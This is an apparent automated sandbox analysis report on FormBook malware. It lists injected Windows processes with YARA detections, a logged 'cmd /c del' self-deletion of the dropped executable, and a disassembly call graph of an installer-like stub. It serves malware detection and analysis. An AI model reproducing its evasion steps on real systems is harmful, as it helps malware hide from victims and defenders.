                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.335351596.0000000000C80000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.335351596.0000000000C80000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.335351596.0000000000C80000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                Reputation:low

                                General

                                Target ID:6
                                Start time:06:11:17
                                Start date:02/04/2022
                                Path:C:\Windows\explorer.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\Explorer.EXE
                                Imagebase:0x7ff6b8cf0000
                                File size:3933184 bytes
                                MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.284289217.000000000711A000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.284289217.000000000711A000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.284289217.000000000711A000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.298993321.000000000711A000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.298993321.000000000711A000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.298993321.000000000711A000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                Reputation:high

                                General

                                Target ID:15
                                Start time:06:11:50
                                Start date:02/04/2022
                                Path:C:\Windows\SysWOW64\NETSTAT.EXE
                                Wow64 process (32bit):true
                                Commandline:C:\Windows\SysWOW64\NETSTAT.EXE
                                Imagebase:0xa80000
                                File size:32768 bytes
                                MD5 hash:4E20FF629119A809BC0E7EE2D18A7FDB
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000002.512171095.0000000000880000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000F.00000002.512171095.0000000000880000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000F.00000002.512171095.0000000000880000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000002.512366000.00000000008D0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000F.00000002.512366000.00000000008D0000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000F.00000002.512366000.00000000008D0000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000002.511628756.0000000000420000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000F.00000002.511628756.0000000000420000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000F.00000002.511628756.0000000000420000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                Reputation:moderate

                                General

                                Target ID:18
                                Start time:06:11:54
                                Start date:02/04/2022
                                Path:C:\Windows\SysWOW64\cmd.exe
                                Wow64 process (32bit):true
                                Commandline:/c del "C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exe"
                                Imagebase:0xc20000
                                File size:232960 bytes
                                MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:high

                                General

                                Target ID:19
                                Start time:06:11:55
                                Start date:02/04/2022
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff7c9170000
                                File size:625664 bytes
                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:high

                                Disassembly

                                Reset < >

                                  Execution Graph

                                  Execution Coverage:15.4%
                                  Dynamic/Decrypted Code Coverage:0%
                                  Signature Coverage:16.8%
                                  Total number of Nodes:1372
                                  Total number of Limit Nodes:20
                                  execution_graph 3196 401941 3197 401943 3196->3197 3202 402da6 3197->3202 3203 402db2 3202->3203 3244 406544 3203->3244 3206 401948 3208 405c13 3206->3208 3286 405ede 3208->3286 3211 405c52 3217 405d72 3211->3217 3300 406507 lstrcpynW 3211->3300 3212 405c3b DeleteFileW 3240 401951 3212->3240 3214 405c78 3215 405c8b 3214->3215 3216 405c7e lstrcatW 3214->3216 3301 405e22 lstrlenW 3215->3301 3218 405c91 3216->3218 3217->3240 3329 40683d FindFirstFileW 3217->3329 3221 405ca1 lstrcatW 3218->3221 3223 405cac lstrlenW FindFirstFileW 3218->3223 3221->3223 3223->3217 3242 405cce 3223->3242 3227 405d55 FindNextFileW 3230 405d6b FindClose 3227->3230 3227->3242 3228 405bcb 5 API calls 3229 405dad 3228->3229 3231 405db1 3229->3231 3232 405dc7 3229->3232 3230->3217 3235 405569 24 API calls 3231->3235 3231->3240 3234 405569 24 API calls 3232->3234 3234->3240 3237 405dbe 3235->3237 3236 405c13 60 API calls 3236->3242 3239 4062c7 36 API calls 3237->3239 3238 405569 24 API calls 3238->3227 3239->3240 3242->3227 3242->3236 3242->3238 3305 406507 lstrcpynW 3242->3305 3306 405bcb 3242->3306 3314 405569 3242->3314 3325 4062c7 MoveFileExW 3242->3325 3245 406551 3244->3245 3246 406774 3245->3246 3249 406742 lstrlenW 3245->3249 3250 406659 GetSystemDirectoryW 3245->3250 3254 406544 10 API calls 3245->3254 3255 40666c GetWindowsDirectoryW 3245->3255 3256 4066e3 lstrcatW 3245->3256 3257 406544 10 API calls 3245->3257 3258 40678e 5 API calls 3245->3258 3259 40669b SHGetSpecialFolderLocation 3245->3259 3270 4063d5 3245->3270 3275 40644e wsprintfW 3245->3275 3276 406507 lstrcpynW 3245->3276 3247 402dd3 3246->3247 3277 406507 lstrcpynW 3246->3277 3247->3206 3261 40678e 3247->3261 3249->3245 3250->3245 3254->3249 3255->3245 3256->3245 3257->3245 3258->3245 3259->3245 3260 4066b3 SHGetPathFromIDListW CoTaskMemFree 3259->3260 3260->3245 3268 40679b 3261->3268 3262 406811 3263 406816 CharPrevW 3262->3263 3266 406837 3262->3266 3263->3262 3264 406804 CharNextW 3264->3262 3264->3268 3266->3206 3267 4067f0 CharNextW 3267->3268 3268->3262 3268->3264 3268->3267 3269 4067ff CharNextW 3268->3269 3282 405e03 3268->3282 3269->3264 3278 406374 3270->3278 3273 406439 3273->3245 3274 406409 RegQueryValueExW RegCloseKey 3274->3273 3275->3245 3276->3245 3277->3247 3279 406383 3278->3279 3280 406387 3279->3280 3281 40638c RegOpenKeyExW 3279->3281 3280->3273 3280->3274 3281->3280 3283 405e09 3282->3283 3284 405e1f 3283->3284 3285 405e10 CharNextW 3283->3285 3284->3268 3285->3283 3335 406507 lstrcpynW 3286->3335 3288 405eef 3336 405e81 CharNextW CharNextW 3288->3336 3291 405c33 3291->3211 3291->3212 3292 40678e 5 API calls 3298 405f05 3292->3298 3293 405f36 lstrlenW 3294 405f41 3293->3294 3293->3298 3295 405dd6 3 API calls 3294->3295 3297 405f46 GetFileAttributesW 3295->3297 3296 40683d 2 API calls 3296->3298 3297->3291 3298->3291 3298->3293 3298->3296 3299 405e22 2 API calls 3298->3299 3299->3293 3300->3214 3302 405e30 3301->3302 3303 405e42 3302->3303 3304 405e36 CharPrevW 3302->3304 3303->3218 3304->3302 3304->3303 3305->3242 3342 405fd2 GetFileAttributesW 3306->3342 3309 405bf8 3309->3242 3310 405be6 RemoveDirectoryW 3312 405bf4 3310->3312 3311 405bee DeleteFileW 3311->3312 3312->3309 3313 405c04 SetFileAttributesW 3312->3313 3313->3309 3315 405584 3314->3315 3316 405626 3314->3316 3317 4055a0 lstrlenW 3315->3317 3318 406544 17 API calls 3315->3318 3316->3242 3319 4055c9 3317->3319 3320 4055ae lstrlenW 3317->3320 3318->3317 3322 4055dc 3319->3322 3323 4055cf SetWindowTextW 3319->3323 3320->3316 3321 4055c0 lstrcatW 3320->3321 3321->3319 3322->3316 3324 4055e2 SendMessageW SendMessageW SendMessageW 3322->3324 3323->3322 3324->3316 3326 4062e8 3325->3326 3327 4062db 3325->3327 3326->3242 3345 40614d 3327->3345 3330 406853 FindClose 3329->3330 3331 405d97 3329->3331 3330->3331 3331->3240 3332 405dd6 lstrlenW CharPrevW 3331->3332 3333 405df2 lstrcatW 3332->3333 3334 405da1 3332->3334 3333->3334 3334->3228 3335->3288 3337 405e9e 3336->3337 3339 405eb0 3336->3339 3338 405eab CharNextW 3337->3338 3337->3339 3341 405ed4 3338->3341 3340 405e03 CharNextW 3339->3340 3339->3341 3340->3339 3341->3291 3341->3292 3343 405bd7 3342->3343 3344 405fe4 SetFileAttributesW 3342->3344 3343->3309 3343->3310 3343->3311 3344->3343 3346 4061a3 GetShortPathNameW 3345->3346 3347 40617d 3345->3347 3349 4062c2 3346->3349 3350 4061b8 3346->3350 3372 405ff7 GetFileAttributesW CreateFileW 3347->3372 3349->3326 3350->3349 3352 4061c0 wsprintfA 3350->3352 3351 406187 CloseHandle GetShortPathNameW 3351->3349 3353 40619b 3351->3353 3354 406544 17 API calls 3352->3354 3353->3346 3353->3349 3355 4061e8 3354->3355 3373 405ff7 GetFileAttributesW CreateFileW 3355->3373 3357 4061f5 3357->3349 3358 406204 GetFileSize GlobalAlloc 3357->3358 3359 406226 3358->3359 3360 4062bb CloseHandle 3358->3360 3374 40607a ReadFile 3359->3374 3360->3349 3365 406245 lstrcpyA 3370 406267 3365->3370 3366 406259 3367 405f5c 4 API calls 3366->3367 3367->3370 3368 40629e SetFilePointer 3381 4060a9 WriteFile 3368->3381 3370->3368 3372->3351 3373->3357 3375 406098 3374->3375 3375->3360 3376 405f5c lstrlenA 3375->3376 3377 405f9d lstrlenA 3376->3377 3378 405fa5 3377->3378 3379 405f76 lstrcmpiA 3377->3379 3378->3365 3378->3366 3379->3378 3380 405f94 CharNextA 3379->3380 3380->3377 3382 4060c7 GlobalFree 3381->3382 3382->3360 3383 4015c1 3384 402da6 17 API calls 3383->3384 3385 4015c8 3384->3385 3386 405e81 4 API calls 3385->3386 3398 4015d1 3386->3398 3387 401631 3389 401663 3387->3389 3390 401636 3387->3390 3388 405e03 CharNextW 3388->3398 3392 401423 24 API calls 3389->3392 3410 401423 3390->3410 3399 40165b 3392->3399 3397 40164a SetCurrentDirectoryW 3397->3399 3398->3387 3398->3388 3400 401617 GetFileAttributesW 3398->3400 3402 405ad2 3398->3402 3405 405a38 CreateDirectoryW 3398->3405 3414 405ab5 CreateDirectoryW 3398->3414 3400->3398 3417 4068d4 GetModuleHandleA 3402->3417 3406 405a85 3405->3406 3407 405a89 GetLastError 3405->3407 3406->3398 3407->3406 3408 405a98 SetFileSecurityW 3407->3408 3408->3406 3409 405aae GetLastError 3408->3409 3409->3406 3411 405569 24 API calls 3410->3411 3412 401431 3411->3412 3413 406507 lstrcpynW 3412->3413 3413->3397 3415 405ac9 GetLastError 3414->3415 3416 405ac5 3414->3416 3415->3416 3416->3398 3418 4068f0 3417->3418 3419 4068fa GetProcAddress 3417->3419 3423 406864 GetSystemDirectoryW 3418->3423 3421 405ad9 3419->3421 3421->3398 3422 4068f6 3422->3419 3422->3421 3424 406886 wsprintfW LoadLibraryExW 3423->3424 3424->3422 3889 401c43 3911 402d84 3889->3911 3891 401c4a 3892 402d84 17 API calls 3891->3892 3893 401c57 3892->3893 3894 401c6c 3893->3894 3895 402da6 17 API calls 3893->3895 3896 402da6 17 API calls 3894->3896 3900 401c7c 3894->3900 3895->3894 3896->3900 3897 401cd3 3899 402da6 17 API calls 3897->3899 3898 401c87 3901 402d84 17 API calls 3898->3901 3902 401cd8 3899->3902 3900->3897 3900->3898 3903 401c8c 3901->3903 3905 402da6 17 API calls 3902->3905 3904 402d84 17 API calls 3903->3904 3906 401c98 3904->3906 3907 401ce1 FindWindowExW 3905->3907 3908 401cc3 SendMessageW 3906->3908 3909 401ca5 SendMessageTimeoutW 3906->3909 3910 401d03 3907->3910 3908->3910 3909->3910 3912 406544 17 API calls 3911->3912 3913 402d99 3912->3913 3913->3891 3914 4028c4 3915 4028ca 3914->3915 3916 4028d2 FindClose 3915->3916 3917 402c2a 3915->3917 3916->3917 3928 4016cc 3929 402da6 17 API calls 3928->3929 3930 4016d2 GetFullPathNameW 3929->3930 3931 4016ec 3930->3931 3937 40170e 3930->3937 3933 40683d 2 API calls 3931->3933 3931->3937 3932 401723 GetShortPathNameW 3934 402c2a 3932->3934 3935 4016fe 3933->3935 3935->3937 3938 406507 lstrcpynW 3935->3938 3937->3932 3937->3934 3938->3937 3939 401e4e GetDC 3940 402d84 17 API calls 3939->3940 3941 401e60 GetDeviceCaps MulDiv ReleaseDC 3940->3941 3942 402d84 17 API calls 3941->3942 3943 401e91 3942->3943 3944 406544 17 API calls 3943->3944 3945 401ece CreateFontIndirectW 3944->3945 3946 402638 3945->3946 3947 402950 3948 402da6 17 API calls 3947->3948 3949 40295c 3948->3949 3950 402972 3949->3950 3951 402da6 17 API calls 3949->3951 3952 405fd2 2 API calls 3950->3952 3951->3950 3953 402978 3952->3953 3975 405ff7 GetFileAttributesW CreateFileW 3953->3975 3955 402985 3956 402a3b 3955->3956 3957 4029a0 GlobalAlloc 3955->3957 3958 402a23 3955->3958 3959 402a42 DeleteFileW 3956->3959 3960 402a55 3956->3960 3957->3958 3961 4029b9 3957->3961 3962 4032b4 35 API calls 3958->3962 3959->3960 3976 4034af SetFilePointer 3961->3976 3964 402a30 CloseHandle 3962->3964 3964->3956 3965 4029bf 3966 403499 ReadFile 3965->3966 3967 4029c8 GlobalAlloc 3966->3967 3968 4029d8 3967->3968 3969 402a0c 3967->3969 3971 4032b4 35 API calls 3968->3971 3970 4060a9 WriteFile 3969->3970 3972 402a18 GlobalFree 3970->3972 3974 4029e5 3971->3974 3972->3958 3973 402a03 GlobalFree 3973->3969 3974->3973 3975->3955 3976->3965 3977 404ed0 GetDlgItem GetDlgItem 3978 404f22 7 API calls 3977->3978 3986 405147 3977->3986 3979 404fc9 DeleteObject 3978->3979 3980 404fbc SendMessageW 3978->3980 3981 404fd2 3979->3981 3980->3979 3982 405009 3981->3982 3987 406544 17 API calls 3981->3987 3984 404463 18 API calls 3982->3984 3983 405229 3985 4052d5 3983->3985 3994 405282 SendMessageW 3983->3994 4020 40513a 3983->4020 3988 40501d 3984->3988 3989 4052e7 3985->3989 3990 4052df SendMessageW 3985->3990 3986->3983 4005 4051b6 3986->4005 4031 404e1e SendMessageW 3986->4031 3991 404feb SendMessageW SendMessageW 3987->3991 3993 404463 18 API calls 3988->3993 3997 405300 3989->3997 3998 4052f9 ImageList_Destroy 3989->3998 4006 405310 3989->4006 3990->3989 3991->3981 4011 40502e 3993->4011 4000 405297 SendMessageW 3994->4000 3994->4020 3995 40521b SendMessageW 3995->3983 3996 4044ca 8 API calls 4001 4054d6 3996->4001 4002 405309 GlobalFree 3997->4002 3997->4006 3998->3997 3999 40548a 4007 40549c ShowWindow GetDlgItem ShowWindow 3999->4007 3999->4020 4004 4052aa 4000->4004 4002->4006 4003 405109 GetWindowLongW SetWindowLongW 4008 405122 4003->4008 4015 4052bb SendMessageW 4004->4015 4005->3983 4005->3995 4006->3999 4022 40534b 4006->4022 4036 404e9e 4006->4036 4007->4020 4009 405127 ShowWindow 4008->4009 4010 40513f 4008->4010 4029 404498 SendMessageW 4009->4029 4030 404498 SendMessageW 4010->4030 4011->4003 4014 405081 SendMessageW 4011->4014 4016 405104 4011->4016 4017 4050d3 SendMessageW 4011->4017 4018 4050bf SendMessageW 4011->4018 4014->4011 4015->3985 4016->4003 4016->4008 4017->4011 4018->4011 4020->3996 4021 405455 4023 405460 InvalidateRect 4021->4023 4025 40546c 4021->4025 4024 405379 SendMessageW 4022->4024 4026 40538f 4022->4026 4023->4025 4024->4026 4025->3999 4045 404dd9 4025->4045 4026->4021 4027 405403 SendMessageW SendMessageW 4026->4027 4027->4026 4029->4020 4030->3986 4032 404e41 GetMessagePos ScreenToClient SendMessageW 4031->4032 4033 404e7d SendMessageW 4031->4033 4034 404e75 4032->4034 4035 404e7a 4032->4035 4033->4034 4034->4005 4035->4033 4048 406507 lstrcpynW 4036->4048 4038 404eb1 4049 40644e wsprintfW 4038->4049 4040 404ebb 4041 40140b 2 API calls 4040->4041 4042 404ec4 4041->4042 4050 406507 lstrcpynW 4042->4050 4044 404ecb 4044->4022 4051 404d10 4045->4051 4047 404dee 4047->3999 4048->4038 4049->4040 4050->4044 4052 404d29 4051->4052 4053 406544 17 API calls 4052->4053 4054 404d8d 4053->4054 4055 406544 17 API calls 4054->4055 4056 404d98 4055->4056 4057 406544 17 API calls 4056->4057 4058 404dae lstrlenW wsprintfW SetDlgItemTextW 4057->4058 4058->4047 4059 4045d3 lstrlenW 4060 4045f2 4059->4060 4061 4045f4 WideCharToMultiByte 4059->4061 4060->4061 4062 404954 4063 404980 4062->4063 4064 404991 4062->4064 4123 405b4b GetDlgItemTextW 4063->4123 4066 40499d GetDlgItem 4064->4066 4072 4049fc 4064->4072 4067 4049b1 4066->4067 4071 4049c5 SetWindowTextW 4067->4071 4075 405e81 4 API calls 4067->4075 4068 404ae0 4121 404c8f 4068->4121 4125 405b4b GetDlgItemTextW 4068->4125 4069 40498b 4070 40678e 5 API calls 4069->4070 4070->4064 4076 404463 18 API calls 4071->4076 4072->4068 4077 406544 17 API calls 4072->4077 4072->4121 4074 4044ca 8 API calls 4079 404ca3 4074->4079 4080 4049bb 4075->4080 4081 4049e1 4076->4081 4082 404a70 SHBrowseForFolderW 4077->4082 4078 404b10 4083 405ede 18 API calls 4078->4083 4080->4071 4087 405dd6 3 API calls 4080->4087 4084 404463 18 API calls 4081->4084 4082->4068 4085 404a88 CoTaskMemFree 4082->4085 4086 404b16 4083->4086 4088 4049ef 4084->4088 4089 405dd6 3 API calls 4085->4089 4126 406507 lstrcpynW 4086->4126 4087->4071 4124 404498 SendMessageW 4088->4124 4091 404a95 4089->4091 4094 404acc SetDlgItemTextW 4091->4094 4098 406544 17 API calls 4091->4098 4093 4049f5 4096 4068d4 5 API calls 4093->4096 4094->4068 4095 404b2d 4097 4068d4 5 API calls 4095->4097 4096->4072 4104 404b34 4097->4104 4099 404ab4 lstrcmpiW 4098->4099 4099->4094 4101 404ac5 lstrcatW 4099->4101 4100 404b75 4127 406507 lstrcpynW 4100->4127 4101->4094 4103 404b7c 4105 405e81 4 API calls 4103->4105 4104->4100 4109 405e22 2 API calls 4104->4109 4110 404bcd 4104->4110 4106 404b82 GetDiskFreeSpaceW 4105->4106 4108 404ba6 MulDiv 4106->4108 4106->4110 4108->4110 4109->4104 4112 404dd9 20 API calls 4110->4112 4120 404c3e 4110->4120 4111 404c61 4128 404485 EnableWindow 4111->4128 4114 404c2b 4112->4114 4113 40140b 2 API calls 4113->4111 4116 404c40 SetDlgItemTextW 4114->4116 4117 404c30 4114->4117 4116->4120 4118 404d10 20 API calls 4117->4118 4118->4120 4119 404c7d 4119->4121 4129 4048ad 4119->4129 4120->4111 4120->4113 4121->4074 4123->4069 4124->4093 4125->4078 4126->4095 4127->4103 4128->4119 4130 4048c0 SendMessageW 4129->4130 4131 4048bb 4129->4131 4130->4121 4131->4130 4132 401956 4133 402da6 17 API calls 4132->4133 4134 40195d lstrlenW 4133->4134 4135 402638 4134->4135 4136 4014d7 4137 402d84 17 API calls 4136->4137 4138 4014dd Sleep 4137->4138 4140 402c2a 4138->4140 4141 4020d8 4142 40219c 4141->4142 4143 4020ea 4141->4143 4145 401423 24 API calls 4142->4145 4144 402da6 17 API calls 4143->4144 4146 4020f1 4144->4146 4151 4022f6 4145->4151 4147 402da6 17 API calls 4146->4147 4148 4020fa 4147->4148 4149 402110 LoadLibraryExW 4148->4149 4150 402102 GetModuleHandleW 4148->4150 4149->4142 4152 402121 4149->4152 4150->4149 4150->4152 4161 406943 4152->4161 4155 402132 4158 401423 24 API calls 4155->4158 4159 402142 4155->4159 4156 40216b 4157 405569 24 API calls 4156->4157 4157->4159 4158->4159 4159->4151 4160 40218e FreeLibrary 4159->4160 4160->4151 4166 406529 WideCharToMultiByte 4161->4166 4163 406960 4164 406967 GetProcAddress 4163->4164 4165 40212c 4163->4165 4164->4165 4165->4155 4165->4156 4166->4163 4167 402b59 4168 402b60 4167->4168 4169 402bab 4167->4169 4172 402d84 17 API calls 4168->4172 4175 402ba9 4168->4175 4170 4068d4 5 API calls 4169->4170 4171 402bb2 4170->4171 4173 402da6 17 API calls 4171->4173 4174 402b6e 4172->4174 4176 402bbb 4173->4176 4177 402d84 17 API calls 4174->4177 4176->4175 4178 402bbf IIDFromString 4176->4178 4180 402b7a 4177->4180 4178->4175 4179 402bce 4178->4179 4179->4175 4185 406507 lstrcpynW 4179->4185 4184 40644e wsprintfW 4180->4184 4182 402beb CoTaskMemFree 4182->4175 4184->4175 4185->4182 4186 402a5b 4187 402d84 17 API calls 4186->4187 4188 402a61 4187->4188 4189 402aa4 4188->4189 4190 402a88 4188->4190 4198 40292e 4188->4198 4192 402abe 4189->4192 4193 402aae 4189->4193 4191 402a8d 4190->4191 4194 402a9e 4190->4194 4200 406507 lstrcpynW 4191->4200 4196 406544 17 API calls 4192->4196 4195 402d84 17 API calls 4193->4195 4194->4198 4201 40644e wsprintfW 4194->4201 4195->4194 4196->4194 4200->4198 4201->4198 3831 40175c 3832 402da6 17 API calls 3831->3832 3833 401763 3832->3833 3834 406026 2 API calls 3833->3834 3835 40176a 3834->3835 3836 406026 2 API calls 3835->3836 3836->3835 3837 403adc 3838 403af4 3837->3838 3839 403ae6 CloseHandle 3837->3839 3844 403b21 3838->3844 3839->3838 3842 405c13 67 API calls 3843 403b05 3842->3843 3845 403b2f 3844->3845 3846 403af9 3845->3846 3847 403b34 FreeLibrary GlobalFree 3845->3847 3846->3842 3847->3846 3847->3847 4202 401d5d 4203 402d84 17 API calls 4202->4203 4204 401d6e SetWindowLongW 4203->4204 4205 402c2a 4204->4205 4206 4054dd 4207 405501 4206->4207 4208 4054ed 4206->4208 4211 405509 IsWindowVisible 4207->4211 4217 405520 4207->4217 4209 4054f3 4208->4209 4210 40554a 4208->4210 4212 4044af SendMessageW 4209->4212 4214 40554f CallWindowProcW 4210->4214 4211->4210 4213 405516 4211->4213 4215 4054fd 4212->4215 4216 404e1e 5 API calls 4213->4216 4214->4215 4216->4217 4217->4214 4218 404e9e 4 API calls 4217->4218 4218->4210 4219 4028de 4220 4028e6 4219->4220 4221 4028ea FindNextFileW 4220->4221 4224 4028fc 4220->4224 4222 402943 4221->4222 4221->4224 4225 406507 lstrcpynW 4222->4225 4225->4224 4233 401563 4234 402ba4 4233->4234 4237 40644e wsprintfW 4234->4237 4236 402ba9 4237->4236 3426 403f64 3427 403f7c 3426->3427 3428 4040dd 3426->3428 3427->3428 3431 403f88 3427->3431 3429 40412e 3428->3429 3430 4040ee GetDlgItem GetDlgItem 3428->3430 3433 404188 3429->3433 3528 401389 3429->3528 3502 404463 3430->3502 3434 403f93 SetWindowPos 3431->3434 3435 403fa6 3431->3435 3446 4040d8 3433->3446 3508 4044af 3433->3508 3434->3435 3438 403ff1 3435->3438 3439 403faf ShowWindow 3435->3439 3436 404118 KiUserCallbackDispatcher 3505 40140b 3436->3505 3443 404010 3438->3443 3444 403ff9 DestroyWindow 3438->3444 3440 4040ca 3439->3440 3441 403fcf GetWindowLongW 3439->3441 3514 4044ca 3440->3514 3441->3440 3447 403fe8 ShowWindow 3441->3447 3449 404015 SetWindowLongW 3443->3449 3450 404026 3443->3450 3448 40440d 3444->3448 3447->3438 3448->3446 3457 40441d ShowWindow 3448->3457 3449->3446 3450->3440 3455 404032 GetDlgItem 3450->3455 3453 40140b 2 API calls 3468 40419a 3453->3468 3454 4043ee DestroyWindow EndDialog 3454->3448 3458 404060 3455->3458 3459 404043 SendMessageW IsWindowEnabled 3455->3459 3456 404164 SendMessageW 3456->3446 3457->3446 3461 40406d 3458->3461 3463 4040b4 SendMessageW 3458->3463 3464 404080 3458->3464 3472 404065 3458->3472 3459->3446 3459->3458 3460 406544 17 API calls 3460->3468 3461->3463 3461->3472 3463->3440 3465 404088 3464->3465 3466 40409d 3464->3466 3469 40140b 2 API calls 3465->3469 3470 40140b 2 API calls 3466->3470 3467 40409b 3467->3440 3468->3453 3468->3454 3468->3460 3471 404463 18 API calls 3468->3471 3474 404463 18 API calls 3468->3474 3469->3472 3473 4040a4 3470->3473 3471->3468 3511 40443c 3472->3511 3473->3440 3473->3472 3475 404215 GetDlgItem 3474->3475 3476 404232 ShowWindow EnableWindow 3475->3476 3477 40422a 3475->3477 3532 404485 EnableWindow 3476->3532 3477->3476 3479 40425c EnableWindow 3484 404270 3479->3484 3480 404275 GetSystemMenu EnableMenuItem SendMessageW 3481 4042a5 SendMessageW 3480->3481 3480->3484 3481->3484 3484->3480 3533 404498 SendMessageW 3484->3533 3534 403f45 3484->3534 3537 406507 lstrcpynW 3484->3537 3486 4042d4 lstrlenW 3487 406544 17 API calls 3486->3487 3488 4042ea SetWindowTextW 3487->3488 3489 401389 2 API calls 3488->3489 3490 4042fb 3489->3490 3490->3446 3490->3468 3491 40432e DestroyWindow 3490->3491 3493 404329 3490->3493 3491->3448 3492 404348 CreateDialogParamW 3491->3492 3492->3448 3494 40437b 3492->3494 3493->3446 3495 404463 18 API calls 3494->3495 3496 404386 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3495->3496 3497 401389 2 API calls 3496->3497 3498 4043cc 3497->3498 3498->3446 3499 4043d4 ShowWindow 3498->3499 3500 4044af SendMessageW 3499->3500 3501 4043ec 3500->3501 3501->3448 3503 406544 17 API calls 3502->3503 3504 40446e SetDlgItemTextW 3503->3504 3504->3436 3506 401389 2 API calls 3505->3506 3507 401420 3506->3507 3507->3429 3509 4044c7 3508->3509 3510 4044b8 SendMessageW 3508->3510 3509->3468 3510->3509 3512 404443 3511->3512 3513 404449 SendMessageW 3511->3513 3512->3513 3513->3467 3515 4044e2 GetWindowLongW 3514->3515 3516 40458d 3514->3516 3515->3516 3517 4044f7 3515->3517 3516->3446 3517->3516 3518 404524 GetSysColor 3517->3518 3519 404527 3517->3519 3518->3519 3520 404537 SetBkMode 3519->3520 3521 40452d SetTextColor 3519->3521 3522 404555 3520->3522 3523 40454f GetSysColor 3520->3523 3521->3520 3524 404566 3522->3524 3525 40455c SetBkColor 3522->3525 3523->3522 3524->3516 3526 404580 CreateBrushIndirect 3524->3526 3527 404579 DeleteObject 3524->3527 3525->3524 3526->3516 3527->3526 3530 401390 3528->3530 3529 4013fe 3529->3433 3529->3456 3530->3529 3531 4013cb MulDiv SendMessageW 3530->3531 3531->3530 3532->3479 3533->3484 3535 406544 17 API calls 3534->3535 3536 403f53 SetWindowTextW 3535->3536 3536->3484 3537->3486 4238 401968 4239 402d84 17 API calls 4238->4239 4240 40196f 4239->4240 4241 402d84 17 API calls 4240->4241 4242 40197c 4241->4242 4243 402da6 17 API calls 4242->4243 4244 401993 lstrlenW 4243->4244 4245 4019a4 4244->4245 4246 4019e5 4245->4246 4250 406507 lstrcpynW 4245->4250 4248 4019d5 4248->4246 4249 4019da lstrlenW 4248->4249 4249->4246 4250->4248 4251 40166a 4252 402da6 17 API calls 4251->4252 4253 401670 4252->4253 4254 40683d 2 API calls 4253->4254 4255 401676 4254->4255 4256 402aeb 4257 402d84 17 API calls 4256->4257 4258 402af1 4257->4258 4259 40292e 4258->4259 4260 406544 17 API calls 4258->4260 4260->4259 4261 4026ec 4262 402d84 17 API calls 4261->4262 4269 4026fb 4262->4269 4263 402838 4264 402745 ReadFile 4264->4263 4264->4269 4265 40607a ReadFile 4265->4269 4267 402785 MultiByteToWideChar 4267->4269 4268 40283a 4283 40644e wsprintfW 4268->4283 4269->4263 4269->4264 4269->4265 4269->4267 4269->4268 4271 4027ab SetFilePointer MultiByteToWideChar 4269->4271 4273 40284b 4269->4273 4274 4060d8 SetFilePointer 4269->4274 4271->4269 4272 40286c SetFilePointer 4272->4263 4273->4263 4273->4272 4275 4060f4 4274->4275 4278 40610c 4274->4278 4276 40607a ReadFile 4275->4276 4277 406100 4276->4277 4277->4278 4279 406115 SetFilePointer 4277->4279 4280 40613d SetFilePointer 4277->4280 4278->4269 4279->4280 4281 406120 4279->4281 4280->4278 4282 4060a9 WriteFile 4281->4282 